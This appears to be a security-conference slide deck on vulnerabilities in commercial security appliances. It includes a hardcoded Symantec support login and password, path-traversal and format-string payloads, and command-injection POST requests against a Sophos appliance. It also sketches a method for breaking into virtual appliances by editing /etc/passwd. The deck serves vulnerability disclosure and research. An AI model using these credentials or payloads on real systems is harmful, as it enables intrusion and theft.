1.3. (In)security Software
- 3. Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
(in)Security Software
- 4. The question
Do you know anybody less boring?
What if the security software (SS) is itself vulnerable?
- 6. The answer
• Symantec Messaging Gateway
– Backdoor by design
Code execution
• F5 BIG-IP
– SQL Injection, XXE
Passwords… Root access
• Applicure dotDefender WAF
– Format string vulnerability
Code execution
• Sophos Web Protection Appliance
– LFI, OS Command Injection
Command execution, admin account pwn
Security software products are the target of the trade ... already!
- 7. The answer
“... inbound and outbound messaging security,
with effective and accurate real-time antispam
and antivirus protection, advanced content
filtering, data loss prevention, and email
encryption ...“
Symantec Messaging Gateway v.9.5.x
SSH?!
Login: support
MD5: 52e3bbafc627009ac13caff1200a0dbf
Password: symantec
- 9. The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
sam/admin/reports/php/getSettings.php
- 13. The answer
“... dotDefender is a web application security
solution (a Web Application Firewall, or WAF)
that offers strong, proactive security for your
websites and web applications ...“
Web Attack?
AppliCure dotDefender WAF <= 4.26
- 14. The answer
Error page can be configured in different ways:
Vars to be added to the body of a custom page:
• %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field
• %RID% - reference ID
• %IP% - server's IP address
• %DATE_TIME% - date of blocked request
Looks nice…
AppliCure dotDefender WAF <= 4.26
- 15. The answer
Format string injection
Algorithm:
• Variables
• Buffer
• ...
• AP_PRINTF()
check for format string vulnerabilities
… should be
<%IP%> Host: …
%666d\xBA\xAD\xBE\xEF…
AppliCure dotDefender WAF <= 4.26
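The pattern this slide outlines (variables substituted into a buffer that is then handed to a printf-style call), shown beside its fix. This is an added example, not dotDefender's code or the presenter's: `expand_ip`, `render_unsafe` and `render_safe` are hypothetical names, the template text is made up, and the sample value is constructed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: replace the first "%IP%" in tmpl with value.
 * Returns 0 on success, -1 if the result does not fit in out. */
int expand_ip(const char *tmpl, const char *value, char *out, size_t n)
{
    const char *tag = strstr(tmpl, "%IP%");
    int len;

    if (tag == NULL)
        len = snprintf(out, n, "%s", tmpl);
    else
        len = snprintf(out, n, "%.*s%s%s",
                       (int)(tag - tmpl), tmpl, value, tag + 4);
    return (len < 0 || (size_t)len >= n) ? -1 : 0;
}

/* Vulnerable pattern: the expanded page becomes the format string, so every
 * '%' that arrived inside the substituted value is parsed as a directive.
 * Compilers report this call under -Wformat-security; the warning is
 * silenced here only so that the "before" version builds. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
int render_unsafe(char *out, size_t n, const char *page)
{
    return snprintf(out, n, page);
}
#pragma GCC diagnostic pop

/* Hardened pattern: constant format string, page passed strictly as data. */
int render_safe(char *out, size_t n, const char *page)
{
    return snprintf(out, n, "%s", page);
}

int main(void)
{
    /* Constructed, harmless input: "%%" is a directive that takes no argument. */
    const char *host = "h%%x";
    char page[128], a[128], b[128];

    if (expand_ip("Blocked by <%IP%>", host, page, sizeof page) != 0)
        return 1;
    render_unsafe(a, sizeof a, page);
    render_safe(b, sizeof b, page);
    printf("unsafe: %s\nsafe:   %s\n", a, b); /* unsafe output loses one '%' */
    return 0;
}
```

The unsafe path rewrites the input, which is the observable sign that request data reached the format parser; the safe path returns the page byte for byte.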
- 17. The answer
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make policy
administration a snap, even for non-technical
users...“
Sophos Web Protection Appliance <= 3.7.8.1
https://<host>/cgi-bin/patience.cgi?id=..
?id=../../persist/config/shared.conf%00
?id=../../log/ui_access_log%00
"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
Passwords!
- 18. The answer
POST /index.php?c=diagnostic_tools HTTP/1.1
...
action=wget&section=configuration&STYLE=<validsessid>&url=%60sleep%205%60
Diagnostic Tools
Sophos Web Protection Appliance <= 3.7.8.1
- 20. The answer
POST /index.php?c=local_site_list_editor HTTP/1.1
...
STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
Local Site List
Sophos Web Protection Appliance <= 3.7.8.1
- 24. Vuln, where art thou?
• Methods for identifying usable bugs in “Software products”
– Application testing and Fuzzing
– Reverse engineering
– Source code analysis
• A short note on so-called “security scanning” tools
- 25. Vuln, where art thou?
• The workflow for the appliance analysis is pretty simple!
– get a virtual appliance demo version
– install the appliance
– add the .vmdk to another VM and mount it there (or use a Linux fs driver that can mount vmdk files)
– add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config)
– start the appliance again and log in :)
– look at the services that are running (and their configuration)
– pwnage ;)
- 27. Vuln, where art thou?
*Move two matches to make it three equal squares
- 30. Sometimes it’s easier to find the vulnerability than might be expected . . .
*doesn’t exist yet
And now for something completely different